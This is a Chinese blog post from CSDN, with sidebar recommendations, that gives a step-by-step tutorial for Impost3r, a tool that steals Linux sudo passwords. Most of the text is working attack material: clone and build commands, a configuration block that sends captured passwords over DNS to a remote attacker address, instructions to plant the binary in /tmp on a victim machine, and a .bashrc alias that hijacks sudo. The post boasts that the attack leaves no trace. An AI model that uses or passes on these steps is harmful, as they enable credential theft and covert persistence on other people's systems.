sudo密码窃取

最新推荐文章于 2024-04-15 09:54:03 发布
最新推荐文章于 2024-04-15 09:54:03 发布
阅读量169 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/119452770
版权
本文介绍了Impost3r,一个用C语言编写的用于窃取Linux系统中sudo密码的工具。通过DNS协议通信,攻击者可以在普通用户权限下设置陷阱,获取合法用户的sudo密码。攻击流程包括使用fdns搭建DNS服务端,安装并配置Impost3r,修改.bashrc文件以劫持sudo命令,最终在目标机器上执行命令并捕获密码。该工具隐蔽性强,窃取成功后不会在目标机器上留下明显痕迹。
摘要由CSDN通过智能技术生成

sudo密码窃取
工具链接:https://github.com/ph4ntonn/Impost3r

mpost3r是一个利用C语言编写,用来窃取linux下sudo密码的工具。

用户可使用此程序在普通用户权限下,制造水坑,窃取合法用户的sudo密码。

DNS协议通信

使用fdns搭建dns服务端

git clone https://github.com/deepdarkness/Fdns

编译

cd Fdns/src
gcc -o dns main.c util.c

运行

./dns

安装impostr

git clone https://github.com/ph4ntonn/Impost3r

修改代码中的ip地址

/*
    Custom setting
*/
# define FILENAME "/tmp/.impost3r" \\设置Impost3r在目标服务器上的位置
# define BACKUP_BASHRC "/tmp/.bashrc" \\设置攻击者备份的源.bashrc在目标服务器上的位置
# define SAVE_OR_SEND 0 \\设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送)
/*
    Send to server
*/
# define MAX_RESEND 30 \\设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数
# define RESEND_INTERVAL 5 \\设置每一次发送密码的间隔
# define REMOTE_ADDRESS "192.168.0.12" \\设置回送密码的远程地址
# define REMOTE_PORT 53 \\设置回送密码的远程端口

/*
    Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" \\设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下

执行make命令编译

我们将生成的.impost3r上传到受害机器的/tmp目录下。

拷贝一份.bashrc文件:

cp ~/.bashrc /tmp/

修改原有的.bashrc文件:

将以下代码加入文件的最后:

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

当目标机器上执行 sudo 命令,并输入正确的密码之后,我们会在自己的 VPS 上看到传输过来的正确密码。这些操作完成之后,在目标机器上不会留下任何痕迹。

HoAd's blog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sudo-stealer:sudo密码窃取者的POC
05-22
sudo-stealer sudo密码窃取者的POC 脚步: mkdir ~/.xd echo "export PATH=~/.xd:\$PATH" >> ~/.bashrc 将sudo文件复制到〜/ .xd / chmod +x ~/.xd/sudo
Impost3r::ghost:Impost3r-一个Linux密码小偷
01-30
Impost3r::ghost:Impost3r-一个Linux密码小偷
Linux系统下利用Impost3r劫持sudo命令窃取凭据
weixin_60274950的博客
07-01 1127
Impost3r是一款针对Linux平台的密码窃取工具,该工具采可以在linux系统的普通用户权限下制造水坑,从目标Linux主机中获取各类密码如ssh、su、sudo等。 软件使用 C 语言编写,可以在窃取密码后自动保存清理窃取痕迹,最大程度上让被攻击者无法察觉异常。...
探索Impost3r:一款创新的代码混淆工具
最新发布
gitblog_00008的博客
04-15 432
探索Impost3r:一款创新的代码混淆工具 Impost3r????Impost3r -- A linux password thief项目地址:https://gitcode.com/gh_mirrors/im/Impost3r 在软件开发的世界里,保护源码的安全性是至关重要的。 是一个Python编写的开源项目,专注于提供代码混淆功能,使得源码难以被逆向工程破解。本文将深入介绍该项目的技术原理、...
ATT&CK权限提升-Linux提权总结
u013797594的博客
06-12 1689
ATT&CK权限提升-Linux提权总结
PHP脚本修改Linux或Unix系统口令方法.docx
10-30
必须确保使用HTTPS协议来加密通信,防止密码在传输过程中被窃取。此外,脚本应存放在受密码保护的目录下,增加额外的安全层。对于用户输入,不应盲目信任,应当进行适当的验证和清理,以防止SQL注入等安全风险。在...
用法PHP脚本修改Linux或Unix系统口令_.docx
10-10
- **HTTPS协议**:避免使用不安全的HTTP,应使用HTTPS来加密传输,防止密码在传输过程中被窃取。 - **受保护的目录**:将脚本放置在受密码保护的目录下,例如使用HTTP基本认证或其他授权机制。 - **用户输入验证*...
centos实现非root账户无密钥访问
08-25
2. **增强安全性**:通过公钥认证方式替代传统的密码验证,即使有人窃取密码也无法登录系统。 3. **自动化运维基础**:为后续使用脚本或工具进行自动化部署、备份等操作打下基础。 #### 二、无密钥登录原理 SSH...
linux基于此语言的密码,Impost3r:一款针对Linux的密码提取工具
weixin_42400518的博客
04-29 160
Impost3r是一款针对Linux平台的密码管理工具,该工具采用C语言开发,可以帮助广大研究人员在渗透测试的过程中,从目标Linux主机中获取各类密码(ssh、su、sudo)。此工具仅限于安全研究和教学,请不要将其用于恶意目的。功能特性1、自动擦除密码窃取行为痕迹;2、通过DNS协议传输结果;3、无需用户交互,用户无法察觉;依赖组件工具下载广大研究人员可以使用下列命令将该项目源码克隆至本...
linux中sudo如何读取标准输入作为密码,避免每次都输入密码?
weixin_33971205的博客
07-25 2390
需求描述:   今天想要在生产环境中,弄自动部署的脚本,但是现在呢,需要sudo权限,每次都要输入.就想看sudo如何能从标准输入读取密码. 操作过程: 1.原来的方法 [deployer@testvm ~]$ echo "deployer" | sudo netstat -ntlp [sudo] password for deployer: #仍然是需要输入密码的. ...
sudo命令自动输入密码的方法
pty_2007的专栏
01-05 7249
首先声明这种方法的安全性不高,但是也是一种方法.命令如下: echo "password" | sudo -S commander使用管道 ,然后sudo使用-S参数即可。
Linux之sudo自动输入密码(一百零四)
Android系统攻城狮
06-23 9809
Linux之sudo自动输入密码
sudo 命令直接添加密码到脚本
热门推荐
wentianen的博客
10-11 1万+
问题有些情况下,部分脚本命令需要获取管理员权限了执行:sudo gem install fastlane在一般情况下,需要等待你输入管理员密码以继续执行。如果你需要在 Jenkins 等需要自动化执行的脚本中时不可行的,此时就需要不输入密码来执行脚本。解决方案1、全局配置参见免密码使用sudo和su。2、将密码以参数形式追加到脚本 使用管道 echo [password] | sudo -S gem
sudo 提权时自动输入密码
imilano的博客
12-11 1万+
问题描述 有这么一个场景:我需要使用 sudo 提权来执行一条命令,可能是打开一个常用的APP,或者是经常需要 pacman进行系统更新。那么,问题来了,由于这个APP我经常使用,而使用sudo时每次都需要输入密码,显然过于麻烦,那么,有没有什么办法可以自动填充密码呢? 嗯哼,办法是有的。 解决方案 目前找到两种解决方案,方案一亲测有效,方案二未试过,仅做记录。 方案一 有的应用自带选项,可以直接...
运行Linux Bash Scripts 脚本时, 自动输入密码获取sudo权限的方法
baiyan83的博客
06-02 2111
运行Linux Bash Scripts 脚本时 自动输入密码获取sudo权限的方法问题解决方法 问题 在运行Linux Bash脚本的时候,经常会被linux系统要求输入密码才能获取sudo的权限继续脚本的执行。交互执行时,脚本执行人员可以人工输入密码来时脚本获取sudo的权限来继续运行。 但是,我们的问题是:全自动运行bash 脚本的时候怎么办。有没有一种方法来自动的帮助我们输入密码获取sudo的权限呢? 解决方法 echo "password for sudo" | sudo -S xxxx.sh o
执行 sudo 命令下避免输入密码的两个方法
modi000的博客
07-11 1884
转载:执行 sudo 命令下避免输入密码的两个方法_frank_rabbit的博客-CSDN博客sudo 命令默认是通过终端设备读取密码,这样每次执行命令都需要用户输入密码后才能继续运行。但对于需要定时执行的脚本,就只能修改 sudo 读取密码的方法了。下面分别是一个关机和一个重启脚本的例子:采用重定向的方法(关机)利用管道(重启)其中选项 -S(S是大写的)是使 sudo 命令用标准输入替代终端输入,这样 sudo 命令就可以从脚本中读取到密码(即脚本中的 password)。只是,这种两种方法均需要将明
窃取linux root密码,[后门艺术]sudo窃取root密码 | 独木の白帆
weixin_39695374的博客
05-09 523
前几天在GitHub上看到一大牛的sudo窃取root用户密码的shell脚本,测试了下还非常管用。真可谓是居家旅行,杀人放火的必备工具啊,所以不敢私藏,在此分享给所有渗透狗~_~废话就不说了,直接上脚本:Shell#!/bin/bash/usr/bin/sudo -ki=0while [ $i != 3 ]; doecho -n "[siii] password for $(whoami): ...
Linux登录凭证窃取二三
sash1mi
10-21 384
Linux登录凭证窃取二三 1、history命令记录敏感操作 Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致历史敏感信息泄露。 2、mimipenguin抓取密码 github下载地址:https://github.com/huntergregal/mimipenguin Linux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。 (没有显示密码
sudo pwfeedback
08-22
这意味着用户无法看到正在输入的密码字符,以防止密码被偷窥或窃取。 通过使用sudo pwfeedback选项,系统可以提供额外的安全性,确保密码输入的机密性。这在公共计算机或多人使用同一台计算机的环境中尤为重要。该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值